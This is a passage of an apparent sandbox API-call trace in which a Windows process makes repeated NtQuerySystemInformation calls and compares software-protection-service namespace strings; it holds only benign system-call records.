ResultLength=0x0) [0285.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d700, Length=0x28, ResultLength=0x0) [0285.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d780, Length=0x28, ResultLength=0x0) [0285.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d780, Length=0x28, ResultLength=0x0) [0285.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d620, Length=0x20, ResultLength=0x0) [0285.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0285.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0285.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0285.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d6e0, Length=0x20, ResultLength=0x0) [0285.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d670, Length=0x20, ResultLength=0x0) [0285.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d670, Length=0x20, ResultLength=0x0) [0285.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d950, Length=0x28, ResultLength=0x0) [0285.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0285.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0285.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0285.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d950, Length=0x28, ResultLength=0x0) [0285.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0285.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0285.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0285.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0285.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0285.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x28, ResultLength=0x0) [0285.064] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0285.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db10, Length=0x28, ResultLength=0x0) [0285.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x28, ResultLength=0x0) [0285.073] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0285.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.080] 